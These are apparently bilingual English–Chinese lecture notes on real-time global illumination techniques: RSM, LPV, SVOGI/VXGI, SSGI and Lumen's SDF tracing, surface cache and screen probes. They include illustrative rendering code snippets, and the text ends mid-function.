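float IndirectIrradiance(const Vec3& X, const Vec3& N, const std::vector<RsmPixel>& Pixels)
{
    float E = 0.0f;
    for (const RsmPixel& P : Pixels)
    {
        Vec3 D = X - P.Xp;                        // x - x_p
        float Dist2 = Dot(D, D);
        float G = std::max(0.0f, Dot(P.Np, D))    // max(0, <n_p | x - x_p>)
                * std::max(0.0f, -Dot(N, D));     // max(0, <n   | x_p - x>)
        E += P.Flux * G / (Dist2 * Dist2 + 1e-6f); // |x - x_p|^4, small bias avoids /0
    }
    return E;
}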

    Cone Tracing with RSM

    使用 RSM 进行锥体追踪

    • Gathering Indirect Illumination

      收集间接照明

      • random sampling RSM pixels

        随机采样 RSM 像素

      • precompute such a sampling pattern and reuse it for all indirect light computations

        预先计算这样的采样模式,并将其重新用于所有间接光计算

• 400 samples were sufficient

          400 个样本就足够了

        • use Poisson sampling to obtain a more even sample distribution

          使用泊松采样获得更均匀的样本分布

    webp

    Sampling pattern example. The sample density decreases and the sample weights (visualized by the disk radius) increases with the distance to the center.

    采样模式示例。随着到中心的距离的增加,样品密度降低,样品重量(通过圆盘半径显示)增加。

    Acceleration with Low-Res Indirect Illumination

    低分辨率间接照明加速

    • Compute the indirect illumination for a low resolution image

      计算低分辨率图像的间接照明

    • For each pixel on full resolution:

      对于全分辨率的每个像素:

      • get its four surrounding low-res samples

        获取其四个周围的低分辨率样本

      • validate by comparing normal and world space position

  通过比较法线和世界空间位置进行验证

      • bi-linear interpolation

        双线性插值

    • Recompute the left (red pixels)

      重新计算左侧(红色像素)

    webp

    Gears of War 4, Uncharted 4, The Last of US, etc.

《战争机器 4》、《神秘海域 4》、《最后生还者》等

    webp

    Thanks, RSM

    Cool Ideas

    很酷的想法

    • Easy to be implemented

      易于实施

    • Photon Injection with RSM

      RSM 的光子注入

    • Cone sampling in mipmap

      mipmap 中的圆锥采样

    • Low-res Indirect illumination with error check

      低分辨率间接照明,带错误检查

    Cons

    缺点

    • Single bounce

      单次反弹

    • No visibility check for indirect illumination

      间接照明不进行能见度检查

    webp

    Light Propagation Volumes (LPV)

    光传播体积(LPV)

    First introduced in CryEngine 3(SIGGRAPH 2009)

    首次引入 CryEngine 3(SIGGRAPH 2009)

    webp

    • Key Idea

      核心思想

      • Use a 3D grid to propagate radiance from directly illuminated surfaces to anywhere else

        使用 3D 网格将辐射从直接照射的表面传播到其他任何地方

    webp

    Steps

    步骤

1. Generation of radiance point set scene representation

   辐射点集场景表示的生成

2. Injection of point cloud of virtual light sources into radiance volume

   将虚拟光源的点云注入辐射体积

3. Volumetric radiance propagation

   体积辐射传播

4. Scene lighting with final light propagation volume

   具有最终光传播量的场景照明

    Reflective shadow map generation → Radiance injection → Radiance propagation → Scene lighting

    反射阴影贴图生成→辐射注入→辐射传播→场景照明

    “Freeze” the Radiance in Voxel

    “冻结”体素中的光芒

    Light Injection

    光注入

    • Pre-subdivide the scene into a 3D grid

      将场景预细分为 3D 网格

    • For each grid cell, find enclosed virtual light sources

      对于每个网格单元,找到封闭的虚拟光源

    • Sum up their directional radiance distribution

  累加它们的方向辐射分布

• Project to the first 2 orders of SH (4 coefficients in total)

  投影到 SH 的前两阶(共 4 个系数)

    webp
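A minimal sketch of the injection math (standard two-band real spherical harmonics; names are illustrative, not CryEngine source): each virtual light's radiance is projected onto the four band-0/band-1 basis functions and accumulated into its grid cell.

struct Sh4 { float C[4]; };

// Real SH basis, bands 0 and 1, evaluated for a unit direction (X, Y, Z).
Sh4 ShBasis(float X, float Y, float Z)
{
    Sh4 B;
    B.C[0] = 0.282095f;      // Y_0^0
    B.C[1] = 0.488603f * Y;  // Y_1^-1
    B.C[2] = 0.488603f * Z;  // Y_1^0
    B.C[3] = 0.488603f * X;  // Y_1^1
    return B;
}

// Accumulate one virtual light's radiance along its direction into a cell.
void InjectIntoCell(Sh4& Cell, float Radiance, float X, float Y, float Z)
{
    Sh4 B = ShBasis(X, Y, Z);
    for (int i = 0; i < 4; ++i)
        Cell.C[i] += Radiance * B.C[i];
}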

    Radiance Propagation

    辐射传播

    • For each grid cell, collect the radiance received from each of its 6 faces

      对于每个网格单元,收集从其 6 个面中的每一个面接收到的辐射

    • Sum up, and again use SH to represent

  累加后,再次用 SH 表示

    • Repeat this propagation several times till the volume becomes stable

      重复此传播几次,直到体积稳定

    webp

Light with "Limited Speed"?

传播速度“受限”的光?

    webp

    Sparse Voxel Octree for Real-time Global Illumination (SVOGI)

    稀疏体素八叉树用于实时全局照明(SVOGI)

Voxelization Pass

体素化 Pass

    webp

    Collect Surface Voxels

    收集表面体素

    webp

    webp

    • Inject Irradiance into voxels from light

      从光线向体素中注入辐照度

    • Filter irradiance inside the octree

      八叉树内部的过滤辐照度

    Shading with Cone Tracing in Voxel Tree

    体素树中的圆锥体跟踪着色

Pass 2: from the camera

Pass 2:从相机出发

    • Emit some cones based on diffuse + specular BRDF

      基于漫反射 + 镜面反射 BRDF 发射一些锥体

    • Query in octree based on the (growing) size of the cone

      基于圆锥体(增长)大小的八叉树查询

    webp

    Voxelization Based Global Illumination (VXGI)

    基于体素化的全局照明(VXGI)

    webp

    • Store the voxel data in clipmaps

      将体素数据存储在 clipmap 中

      • Multi-resolution texture

        多分辨率纹理

      • Regions near the center have higher spatial resolution

        中心附近的区域具有更高的空间分辨率

      • Seems to map naturally to cone tracing needs

        似乎很自然地映射到锥体跟踪需求

    • A clipmap is easier to build than SVO

      clipmap 比 SVO 更容易构建

      • No nodes, pointers etc., handled by hardware

    无需节点、指针等,均由硬件处理

• A clipmap is easier to read from

  Clipmap 更容易读取

    • Clipmap size is (64…256)^3 with 3…5 levels of detail

      Clipmap 大小为(64…256)^3,具有 3…5 个细节级别

      • 16…32 bytes per voxel => 12 MB … 2.5 GB of video memory required

        每个体素 16…32 字节=>12 MB…需要 2.5 GB 的视频内存

    Voxel Update and Toroidal Addressing

    体素更新和环形寻址

    • A fixed point in space always maps to the same address in the clipmap

      空间中的固定点总是映射到剪贴图中的同一地址

    • The background shows texture addresses: frac(worldPos.xy / clipmapSize.xy)

      背景显示纹理地址:frac(worldPos.xy / clipmapSize.xy)

    webp

    webp

    Voxelization for Opacity

    不透明度的体素化

    • We have a triangle and a voxel

      我们有一个三角形和一个体素

    • Select the projection plane that yields the biggest projection area

      选择产生最大投影面积的投影平面

    • Rasterize the triangle using MSAA to compute one coverage mask per pixel

      使用 MSAA 对三角形进行光栅化,以计算每个像素的一个覆盖掩模

    • Take the MSAA samples and reproject them onto other planes

      采集 MSAA 样本并将其重新投影到其他平面上

    • Repeat that process for all covered samples

      对所有覆盖的样本重复该过程

    • Thicken the result by blurring all the reprojected samples

  通过模糊所有重新投影的样本来加厚结果

    webp

    Voxelization: Directional Coverage

    体素化:定向覆盖

    webp

    Light Injection

    光注入

    • Calculate emittance of voxels that contain surfaces lit by direct lights

      计算包含由直射光照亮的表面的体素的发射度

    • Take information from reflective shadow maps (RSM)

      从反射阴影图(RSM)中获取信息

    webp

    webp

    Shading with Cone Tracing

    使用圆锥体追踪进行着色

    • generate several cones based on BRDF

      基于 BRDF 生成多个锥体

    webp

    Accumulate Voxel Radiance and Opacity along the Path

    沿路径累积体素辐射度和不透明度

$$C_{\mathrm{dst}}\leftarrow C_{\mathrm{dst}}+(1-\alpha_{\mathrm{dst}})\,C_{\mathrm{src}}\\ \alpha_{\mathrm{dst}}\leftarrow\alpha_{\mathrm{dst}}+(1-\alpha_{\mathrm{dst}})\,\alpha_{\mathrm{src}}$$

    webp
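A minimal sketch of this front-to-back accumulation (the voxel sampling callback, the fixed step and the 0.999 saturation cutoff are assumptions for illustration):

struct Sample { float R, G, B, A; };

Sample AccumulateCone(Sample (*SampleVoxel)(float Dist), float MaxDist, float Step)
{
    Sample Dst = {0, 0, 0, 0};
    for (float T = 0.0f; T < MaxDist && Dst.A < 0.999f; T += Step)
    {
        Sample Src = SampleVoxel(T);  // pre-filtered voxel radiance/opacity
        float W = 1.0f - Dst.A;       // (1 - alpha_dst)
        Dst.R += W * Src.R;           // C_dst += (1 - alpha_dst) * C_src
        Dst.G += W * Src.G;
        Dst.B += W * Src.B;
        Dst.A += W * Src.A;           // alpha_dst += (1 - alpha_dst) * alpha_src
    }
    return Dst;
}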

    webp

    Problems in VXGI

    VXGI 中的问题

    Incorrect Occlusion (opacity)

    遮挡不正确(不透明)

• Naively combines opacity with alpha blending.

  简单地用 alpha 混合来合并不透明度。

    Light Leaking

    漏光

• when the occluding wall is much smaller than the voxel size

  当遮挡墙远小于体素尺寸时

    webp

    Screen Space Global Illumination (SSGI)

    屏幕空间全局照明(SSGI)

    General Idea

    总体思路

    • Reuse screen-space data

      重复使用屏幕空间数据

    webp

    Radiance Sampling in Screen Space

    屏幕空间中的辐射采样

    For each fragment:

    对于每个片段:

    • Step 1: compute many reflection rays

      步骤 1:计算许多反射光线

    • Step 2: march along ray direction (in depth gbuffer)

      步骤 2:沿射线方向行进(在深度 gbuffer 中)

• Step 3: use color of hit point as indirect lighting

  步骤 3:使用命中点的颜色作为间接光照

    webp

    Linear Raymarching

    线性射线推进

    • General Steps

      一般步骤

      • Step forward at a fixed step size

        以固定步长向前迈进

      • At each step, check depth value

        每一步,检查深度值

    • Features

      特征

      • Fast

        快速

      • May skip thin objects

        可能跳过薄物体

    webp
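A minimal sketch of the idea (the depth lookup, step sizes and thickness constant are assumptions for illustration, not engine code):

struct Hit { bool bFound; float U, V; };

// DepthAt(u, v) is an assumed lookup into the scene depth buffer.
Hit LinearRaymarch(float (*DepthAt)(float U, float V),
                   float U, float V, float RayDepth,
                   float DU, float DV, float DDepth, int MaxSteps)
{
    for (int i = 0; i < MaxSteps; ++i)
    {
        U += DU; V += DV; RayDepth += DDepth;   // fixed step along the ray
        float SceneDepth = DepthAt(U, V);
        // Hit when the ray dips behind the depth buffer surface. A small
        // thickness keeps the test from registering hits far behind geometry.
        if (RayDepth > SceneDepth && RayDepth < SceneDepth + 0.01f)
            return {true, U, V};
    }
    return {false, 0.0f, 0.0f};
}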

Hierarchical Tracing

层次追踪

    • Generate min-depth mipmap (pyramid)

      生成最小深度 mipmap(金字塔)

    • Stackless ray walk of min-depth mipmap

  对最小深度 mipmap 做无栈的光线遍历

    webp

level = 0;
while (level > -1)
{
    StepCurrentCell();
    if (above z plane) level++;
    if (below z plane) level--;
}

    webp

    Ray Reuse among Neighbor Pixels

    相邻像素间的光线复用

    • Store hitpoint data

      存储命中点数据

    • Assume visibility is the same between neighbors

      假设邻居之间的能见度相同

• Regard the ray to a neighbor's hit point as valid

  将指向邻居命中点的射线视为有效

    webp

    Cone Tracing with Mipmap Filtering

    基于 Mipmap 滤波的圆锥跟踪

Estimate footprint of a cone at hit point

估算圆锥在命中点处的足迹

    • roughness

      粗糙度

    • distance to hit

      击中距离

    Sample the color mipmap

    对彩色 mipmap 进行采样

    • mip level is determined by footprint

      mip 级别由足迹决定

    Pre-filter color mipmap (pyramid)

    预过滤彩色 mipmap(金字塔)

    webp

    SSGI Summary

    SSGI 总结

    • Pros:

      优点:

      • Fast for glossy and specular reflections

        快速实现光泽和镜面反射

      • Good quality

        质量好

      • No occlusion issues

        无遮挡问题

    • Cons:

      缺点:

      • Missing information outside screen

        屏幕外信息缺失

• Effects of the incorrect visibility assumption in neighbor ray reuse

  相邻光线复用中可见性假设不正确带来的影响

    webp

    Unique Advantages of SSGI

    SSGI 的独特优势

    • Easy to handle close contact shadow

      易于处理近距离接触阴影

    • Precise hit point calculation

      精确的命中点计算

    • Decouple from scene complexity

      与场景复杂性解耦

    • Handle dynamic objects

      处理动态对象

    Lumen

Lumen is a real-time global illumination system developed by Epic Games for Unreal Engine. It aims to make lighting in games and other real-time applications more believable. Lumen computes light transport, reflection and refraction dynamically, with no need to pre-bake lightmaps, so it adapts to changes in the scene such as moving light sources or objects. By computing complex effects like indirect lighting and reflections in real time, it produces a more natural, immersive image.

    Ray Traces are slow

    光线追踪很慢

    • Can only afford 1/2 ray per pixel

      每像素只能提供 1/2 射线

    • But quality GI needs hundreds

      但高质量的 GI 需要数百个

    webp

    Sampling is hard

    取样很困难

    Previous real-time work: Irradiance Fields

    以前的实时工作:辐照度场

    • Problems:

      问题:

      • Leaking and over-occlusion

    漏光和过度遮挡

      • Probe placement

        探头放置

      • Slow lighting update

        照明更新缓慢

      • Distinctive flat look

        独特的扁平外观

    Previous real-time work: Screen Space Denoiser

    以前的实时工作:屏幕空间去噪器

    • Problems:

      问题:

      • Too noisy in many difficult indoor cases

        在许多困难的室内环境中噪音太大

      • Noise is not constant.

        噪音不是恒定的。

    webp

    Low-res filtered scene space probes lit full pixels

    低分辨率滤波场景空间探测器照亮了全像素

    webp

    Phase 1 : Fast Ray Trace in Any Hardware

    阶段 1:任何硬件中的快速光线追踪

Signed Distance Field (SDF)

有向距离场(SDF)

    What is SDF

    • The distance to the nearest surface at every point

      每个点到最近曲面的距离

    • Inside regions store negative distance (signed)

      内部区域存储负距离(带符号)

    • Distance = 0 is the surface

      距离 = 0 是曲面

    webp

    Per-Mesh SDF

    每网格 SDF

Storing the SDF of the whole scene is expensive

存储整个场景的 SDF 代价高昂

    Generated for each mesh

    为每个网格生成

    • Resolution based on mesh size

      基于网格大小的分辨率

• Embree point query

  Embree 点查询

• Trace rays and count triangle back faces for the sign (more than 25% back-face hits means negative)

  追踪光线并统计命中的三角形背面来确定符号(超过 25% 命中背面则为负)

    webp

    • Original Mesh

      原始网格

• Resolution is too low, important features are lost

  分辨率太低,重要特征丢失

• Resolution has been increased, important features represented

  分辨率提高后,重要特征得以呈现

    SDF for Thin meshes

    用于薄网格的 SDF

    • Half voxel expand to fix leaking

      半体素扩展以修复泄漏

    • Lost contact shadows due to surface bias

      表面偏移导致接触阴影丢失

      • Over occlusion better than leaking

    过度遮挡好过漏光

    webp

    Ray Tracing with SDF

    使用 SDF 进行光线追踪

    Ray intersection skips through empty space based on distance to surface

    射线交点根据到曲面的距离跳过空白空间

    • Safe and fast

      安全快捷

    • Each time at $p$, just travel $SDF(p)$ distance

      每次在 $p$ 时,只需行进 $SDF(p)$ 距离

    webp
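A minimal sphere-tracing sketch (the SDF callback, the iteration cap and the hit epsilon are assumptions for illustration):

struct Vec3f { float X, Y, Z; };

float TraceSdf(float (*Sdf)(Vec3f), Vec3f Origin, Vec3f Dir, float MaxT)
{
    float T = 0.0f;
    for (int i = 0; i < 128 && T < MaxT; ++i)
    {
        Vec3f P = {Origin.X + T * Dir.X, Origin.Y + T * Dir.Y, Origin.Z + T * Dir.Z};
        float D = Sdf(P);   // distance to the nearest surface at p
        if (D < 1e-3f)
            return T;       // close enough: report a hit at distance t
        T += D;             // safe skip: no surface is closer than SDF(p)
    }
    return -1.0f;           // miss
}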

    Cone Tracing with SDF (ie. Soft Shadow)

    使用 SDF 进行圆锥体跟踪(即软阴影)

    webp

    Sparse Mesh SDF

    稀疏网格 SDF

    Divides the Mesh SDF into bricks

    将网格 SDF 划分为块

• Define a max_encode_distance

  定义 max_encode_distance

      • Invalid if ∀ sdf(brick) > max_encode_distance

        如果 ∀sdf(brick) > max_encode_distance,则无效

• IndirectionTable stores the index of each brick

      IndirectionTable 存储每块砖的索引

    webp

    webp

    Mesh SDF LoD

    网状 SDF LoD

    • Every frame GPU gathers requests

      每一帧 GPU 都会收集请求

• CPU downloads requests and streams pages in/out

  CPU 回读请求并流式换入/换出页面

• 3 mips are generated

  生成 3 个 mip

  • Lowest resolution always loaded and the other 2 streamed

    始终加载最低分辨率,其余 2 个通过流式传输加载

    webp

    Sparse Mesh SDF

    稀疏网格 SDF

    webp

    Ray Tracing Cost in Real Scene

    真实场景中的光线追踪成本

    webp

    Trace camera rays and visualize the number of steps

    追踪相机光线并可视化步数

    Many Objects along Each Ray

    每条射线上有许多物体

    webp

    Number of hit objects along each ray

    沿每条射线的命中物体数量

    Global SDF

全局 SDF

• Global SDF is inaccurate near surface

  全局 SDF 在表面附近不准确

    • Sample object SDFs near start of cone, global SDF for the rest

      在圆锥体起点附近采样对象 SDF,其余部分为全局 SDF

    webp

    Ray Tracing with Global SDF

    使用全局 SDF 进行光线追踪

    Massively reduces tracing cost on overlapping objects

    大幅降低重叠对象的跟踪成本

    webp

    Cache Global SDF around Camera

    在相机周围缓存全局 SDF

• 4 clipmaps centered around camera

  以相机为中心的 4 级 clipmap

    • Clipmaps are scrolled with movement

      Clipmap 随着移动而滚动

    • Distant clipmaps updated less frequently

      远处的 clipmap 更新频率较低

    • Also sparsely stored (~16x memory saving)

      存储也很稀疏(约节省 16 倍内存)

    webp

    Phase 2 : Radiance Injection and Caching

    阶段 2:辐射注入和缓存

Mesh card – orthographic camera on 6 axis-aligned directions

Mesh Card——沿 6 个轴对齐方向放置的正交相机

class FLumenCard
{
    FLumenCardOBB LocalOBB;
    FLumenCardOBB WorldOBB;
    uint8 AxisAlignedDirectionIndex;
};

    webp

    webp

    Generate Surface Cache

    生成 Surface 缓存

    Two Passes

    两个步骤

Pass 1: Card capture

Pass 1:卡片捕获

    • Fix texel budget per frame (512 x 512)

      固定每帧的纹理像素预算(512 x 512)

    • Sort by distance to camera and GPU feedback

      按距离相机和 GPU 反馈排序

• Capture resolution depends on the card's projection on screen

  捕获分辨率取决于卡片在屏幕上投影的大小

    webp

Pass 2: Copy cards to surface cache and compress

Pass 2:将卡片复制到表面缓存并压缩

    webp

    4096 x 4096 Surface Cache Atlas

Map       Color channels   Texture compression   Cache size
Albedo    RGB8             BC7                   16mb
Opacity   R8               BC4                   8mb
Depth     R16              -                     32mb
Normal    Hemisphere RG8   BC4                   16mb
Emissive  RGB Float16      BC6H                  16mb

    compress from 320mb to 88mb

    从 320mb 压缩到 88mb

static FLumenSurfaceLayerConfig Configs[(uint32)ELumenSurfaceCacheLayer::MAX] =
{
    {TEXT("Depth"),    PF_G16,            PF_Unknown, PF_Unknown,           FVector(1.0f, 0.0f, 0.0f)},
    {TEXT("Albedo"),   PF_R8G8B8A8,       PF_BC7,     PF_R32G32B32A32_UINT, FVector(0.0f, 0.0f, 0.0f)},
    {TEXT("Opacity"),  PF_G8,             PF_BC4,     PF_R32G32B32A32_UINT, FVector(1.0f, 0.0f, 0.0f)},
    {TEXT("Normal"),   PF_R8G8,           PF_BC5,     PF_R32G32B32A32_UINT, FVector(0.0f, 0.0f, 0.0f)},
    {TEXT("Emissive"), PF_FloatR11G11B10, PF_BC6H,    PF_R32G32B32A32_UINT, FVector(0.0f, 0.0f, 0.0f)}
};

View Dependent Per-Object Card Resolution

视角相关的每对象卡片分辨率

    128 x 128 physical pages in a 4096 x 4096 atlas

    4096 x 4096 图集中的 128 x 128 个物理页面

    Card capture res >= 128 x 128

    卡捕获分辨率 >= 128 x 128

    • Split into multiple 128 x 128 physical pages

      拆分为多个 128 x 128 物理页面

    Card capture res < 128 x 128

    卡捕获分辨率 < 128 x 128

    • Sub-allocate from a 128 x 128 physical page

      从 128 x 128 物理页面进行子分配

    webp

    How can we “freeze” lighting on Surface Cache

    我们如何在 Surface Cache 上“冻结”照明

    How to compute lighting on hit?

    如何计算命中时的光照?

    • Is the pixel under the shadow

      像素是否位于阴影之下

    • How can we handle multi-bounce

      我们如何处理多次反弹

    Lighting Cache Pipeline

    照明缓存管道

    webp

    Direct Lighting

    直接照明

    • Divide 128 x 128 page into 8 x 8 tiles

  将 128 x 128 的页面划分为 8 x 8 的图块

• Cull lights per 8 x 8 tile

  以 8 x 8 的 tile 为单位剔除光源

• Select first 8 lights per tile

  每个 tile 选取前 8 个光源

• 1-bit shadow mask

  1 bit 阴影遮罩

    webp

One tile can be lit by multiple lights; the results are accumulated

一个 tile 可以被多个光源照亮,结果会累加

    webp

    Global SDF can’t sample surface cache

    全局 SDF 无法对曲面缓存进行采样

• no per-mesh information, only hit position and normal

  没有每网格的信息,只有命中位置和法线

    Use voxel lighting to sample

    使用体素照明进行采样

    webp

Voxel Clipmap for Radiance Caching of the Whole Scene

用于缓存整个场景辐射的体素 Clipmap

    4 level clipmaps of 64x64x64 voxels

    64 x 64 x 64 体素的 4 级剪贴图

    • Radiance per 6 directions per voxel

      每个体素每 6 个方向的辐射

    • Sample and interpolate 3 directions by normal

      通过法线对 3 个方向进行采样和插值

    • Clipmap0 cover 50m^3, voxel size is 0.78m

      Clipmap0 覆盖 50m^3,体素大小为 0.78m

    • Store in 3D texture

      存储在 3D 纹理中

Clipmap update frequency rules

Clipmap 更新频率规则

                  Clipmap 0   Clipmap 1   Clipmap 2   Clipmap 3
Start_Frame       0           1           3           7
Update_interval   2           4           8           8

    webp

Build Voxel Faces by Short Ray Casts

通过短距离光线投射构建体素面

    • Trace mesh DF on 6 directions per voxel

      在每个体素的 6 个方向上跟踪网格 DF

    • Hit mesh id and hit distance

      命中网格 id 和命中距离

• RayStart = VoxelCenter – AxisDir * VoxelRadius

• RayEnd = VoxelCenter + AxisDir * VoxelRadius

    webp

Store hit info into a visibility buffer: uint32 [Hit distance | Hit object id]

将命中信息存入可见性缓冲区:uint32 [命中距离 | 命中对象 id]

Filter Most Objects Out by 4x4x4 Tiles

通过 4x4x4 的 tile 过滤掉大部分对象

    webp

    Inject light into clipmap

    将光线注入 clipmap

    • Clear all voxel lighting in entire Clipmap

      清除整个 Clipmap 中的所有体素照明

    • Compact all valid VisBuffer in Clipmap

      压缩 Clipmap 中的所有有效 VisBuffer

• Sample FinalLighting from VisBuffer and inject lighting

  从 VisBuffer 中采样 FinalLighting 并注入光照

    webp

    Indirect Lighting

    间接照明

• Place 2 x 2 probes on each tile - each probe covers 4 x 4 texels

  在每个 tile 上放置 2 x 2 个探针,每个探针覆盖 4 x 4 个纹理像素

    • Trace 16 rays from hemisphere per probe

      每个探测器追踪 16 条来自半球的射线

    • Jitter probe placement and ray directions

      抖动探头位置和射线方向

    webp

    • Spatial filtering between probes

      探头之间的空间滤波

    • Convert to TwoBandSH (store in half4)

      转换为 TwoBandSH(存储在 half4)

    webp

    Per-Pixel Indirect Lighting with 4 Probe Interpolation

    采用 4 探头插值的每像素间接照明

• Integrate per pixel - bilinear interpolation of 4 neighboring probes

  逐像素积分——对 4 个相邻探针做双线性插值

    webp

    Combine Lighting

    组合照明

    FinalLighting = (DirectLighting + IndirectLighting) * Diffuse_Lambert(Albedo) + Emissive;

    webp

Lighting Update Strategy

光照更新策略

    Fix budget

    固定预算

    • 1024 x 1024 texels for direct lighting

      1024 x 1024 像素用于直接照明

    • 512 x 512 texels for indirect lighting

      512 x 512 像素用于间接照明

• Select pages to update based on Priority = LastUsed - LastUpdated

  根据优先级 Priority = LastUsed - LastUpdated 选择要更新的页面

    Priority queue using bucket sort

    使用桶排序的优先级队列

    • 128 buckets

      128 桶

• Update buckets in priority order until the budget is reached (see the sketch below)

  按优先级依次更新各个桶,直到达到预算(见下方示例)
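A minimal sketch of that bucketed selection (types, the clamping of priorities and the budget accounting are assumptions, not Lumen source):

#include <algorithm>
#include <cstdint>
#include <vector>

struct Page { uint32_t Id; uint32_t LastUsed; uint32_t LastUpdated; uint32_t Texels; };

std::vector<uint32_t> SelectPagesToUpdate(const std::vector<Page>& Pages, uint32_t Budget)
{
    const int NumBuckets = 128;
    std::vector<std::vector<const Page*>> Buckets(NumBuckets);
    for (const Page& P : Pages)
    {
        // Bucket sort by Priority = LastUsed - LastUpdated, clamped to the bucket range.
        int Priority = std::clamp<int>((int)P.LastUsed - (int)P.LastUpdated, 0, NumBuckets - 1);
        Buckets[Priority].push_back(&P);
    }
    std::vector<uint32_t> Selected;
    for (int B = NumBuckets - 1; B >= 0 && Budget > 0; --B) // highest priority first
        for (const Page* P : Buckets[B])
        {
            if (P->Texels > Budget) continue; // would blow this frame's texel budget
            Budget -= P->Texels;
            Selected.push_back(P->Id);
        }
    return Selected;
}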

    Phase 3: Build a lot of Probes with Different Kinds

    第三阶段:构建大量不同类型的探测器

    Screen Space Probe

    屏幕空间探测器

    Octahedral atlas with border

    带边框的八面体图集

    • Typically 8 x 8 per probe

      通常每个探头 8 x 8

    • Uniformly distributed world space directions

      均匀分布的世界空间方向

    • Neighbors have matching directions

      邻居有匹配的方向

    Radiance and HitDistance in 2d atlas

    二维图谱中的辐射度和 HitDistance

    webp

    Octahedron mapping

    八面体映射

    webp

float2 UnitVectorToOctahedron(float3 N)
{
    N.xy /= dot(1, abs(N));            // project the sphere onto the octahedron
    if (N.z <= 0)
    {
        // Lower hemisphere: fold the triangles outward over the diagonals.
        float x_factor = N.x >= 0 ? 1.0 : -1.0;
        float y_factor = N.y >= 0 ? 1.0 : -1.0;
        N.xy = (1 - abs(N.yx)) * float2(x_factor, y_factor);
    }
    return N.xy;
}

    Screen Probe Placement

    屏幕探头放置

    • Adaptive placement with Hierarchical Refinement

      具有层次细化的自适应布局

    • Iteratively place where interpolation fails

      迭代地放置插值失败的位置

    webp

    Plane distance weighting of Probe Interpolation

    探针插值的平面距离加权

    webp

    Detect Non-Interpolatable Cases

    检测不可插值的案例

float4 PlaneDistances;
PlaneDistances.x = abs(dot(float4(Position00, -1), ScenePlane));
PlaneDistances.y = abs(dot(float4(Position10, -1), ScenePlane));
PlaneDistances.z = abs(dot(float4(Position01, -1), ScenePlane));
PlaneDistances.w = abs(dot(float4(Position11, -1), ScenePlane));

float4 RelativeDepthDifference = PlaneDistances / SceneDepth;

// Corners that lie far off the receiver's plane get a near-zero weight.
float4 DepthWeights = CornerDepths > 0 ? exp2(-10000.0f * (RelativeDepthDifference * RelativeDepthDifference)) : 0;

InterpolationWeights = float4(
    (1 - BilinearWeights.y) * (1 - BilinearWeights.x),
    (1 - BilinearWeights.y) * BilinearWeights.x,
    BilinearWeights.y * (1 - BilinearWeights.x),
    BilinearWeights.y * BilinearWeights.x);
InterpolationWeights *= DepthWeights;

float Epsilon = .01f;
ScreenProbeSample.Weights /= max(dot(ScreenProbeSample.Weights, 1), Epsilon);
float LightingIsValid = (dot(ScreenProbeSample.Weights, 1) < 1.0f - Epsilon) ? 0.0f : 1.0f;

    Screen Probe Atlas

    屏幕探针图谱

• The atlas has an upper limit for real-time budgets

  图集大小受实时预算的上限约束

    • Place adaptive probes at the bottom of the atlas

      将自适应探头放置在图谱底部

    webp

    webp

    Screen Probe Jitter

    屏幕探头抖动

• Place probes directly on pixels

  将探针直接放置在像素上

    • Temporally jitter placement and direction

      时间抖动位置和方向

• Use Hammersley points in [0, 15]

  在 [0, 15] 范围内使用 Hammersley 点

    webp

    Importance Sampling

    重要性采样

    But too much noise at ½ ray per pixel

    但每像素 ½ 射线的噪声太大

    webp

Better sampling - importance sample the incoming lighting and the BRDF

更好的采样——对入射光照和 BRDF 做重要性采样

    webp

$\lim_{N\to\infty}\frac{1}{N}\sum_{k=1}^{N}\frac{L_i(l)\,f_s(l\to v)\cos(\theta_l)}{P_k}$

    We would like to distribute rays proportional to the integrand

    我们希望光线的分布与被积函数成正比

    How can we estimate these?

    我们如何估算这些?

Approximate Radiance Importance from Last Frame Probes

用上一帧的探针近似辐射重要性

    webp

    Incoming Radiance:

    入射辐射:

• Reproject to the last frame and average the four neighboring Screen Probes' radiance

  重投影到上一帧,并对四个相邻屏幕探针的辐射求平均

    • No need to do an expensive search, as rays already indexed in octahedral atlas

      无需进行昂贵的搜索,因为光线已经在八面体图集中索引

• Fallback to World Space Probe Radiance if neighboring probes are occluded

  如果相邻探针被遮挡,则回退到世界空间探针的辐射

Accumulate Normal Distribution Nearby

累积附近的法线分布

    webp

    BRDF:

• For a probe that's placed on a flat wall, about half of its sphere has a zero BRDF

  对于放置在平坦墙壁上的探针,其球面大约有一半的 BRDF 为零

    • Accumulate from pixels that will use this Screen Probe

      从将使用此屏幕探测器的像素中累积

Nearby Normal Accumulation

附近法线的累积

• Gather 64 neighboring pixels around the current probe's pixel in a 32 x 32 pixel range

  在 32 x 32 像素范围内收集当前探针像素周围的 64 个相邻像素

• Accept a pixel if its depth weight > 0.1

  如果像素的深度权重 > 0.1,则接受该像素

    • Accumulate these pixels’ world normal into SH

      将这些像素的世界法线累积到 SH 中

    webp

    Structured Importance Sampling

    结构化重要性抽样

    • Assigns a small number of samples to hierarchically structured areas of the Probability Density Function (PDF)

      将少量样本分配给概率密度函数的分层结构区域(PDF)

• Achieves good global stratification

  实现良好的全局分层

    • Sample placement requires offline algorithm

      样本放置需要离线算法

    webp

    Maps perfectly to Octahedral mip quadtree!

    完美映射到八面体 mip 四叉树!

    webp

    Fix Budget Importance Sampling based on Lighting and BRDF

    基于照明和 BRDF 的固定预算重要性抽样

    • Start with uniformly distributed probe ray directions

      从均匀分布的探头射线方向开始

    • Fixed probe tracing ray count = 64

      固定探头跟踪射线计数 = 64

• Calculate BRDF PDF * Lighting PDF for each octahedral texel

  为每个八面体纹理像素计算 BRDF PDF * Lighting PDF

    • Sort rays by PDF from low to high

      按 PDF 从低到高对光线进行排序

    • For every 3 rays with PDF below cull threshold, supersample the matching highest PDF ray

      对于 PDF 低于剔除阈值的每 3 条射线,对匹配的最高 PDF 射线进行超采样

    webp

    webp

    webp

    webp

The right side shows the result of using the BRDF and Lighting PDFs.

    Denoising and Spatial Probe Filtering

    去噪和空间探测滤波

    Denoise: Spatial filtering for Probe

    去噪:探头的空间滤波

    Large spatial filter for cheap

    大空间滤波器,成本低

• Each probe covers 16 x 16 pixels; a 3 x 3 filter kernel in probe space equals 48 x 48 in screen space

  每个探针覆盖 16 x 16 像素,探针空间中 3 x 3 的滤波核相当于屏幕空间中的 48 x 48

Can ignore normal differences between spatial neighbors

可以忽略空间邻居之间的法线差异

    • Only depth weighting

      仅深度加权

    webp

float GetFilterPositionWeight(float ProbeDepth, float SceneDepth)
{
    float DepthDifference = abs(ProbeDepth - SceneDepth);
    float RelativeDepthDifference = DepthDifference / SceneDepth;
    return ProbeDepth >= 0 ? exp2(-SpatialFilterPositionWeightScale * (RelativeDepthDifference * RelativeDepthDifference)) : 0;
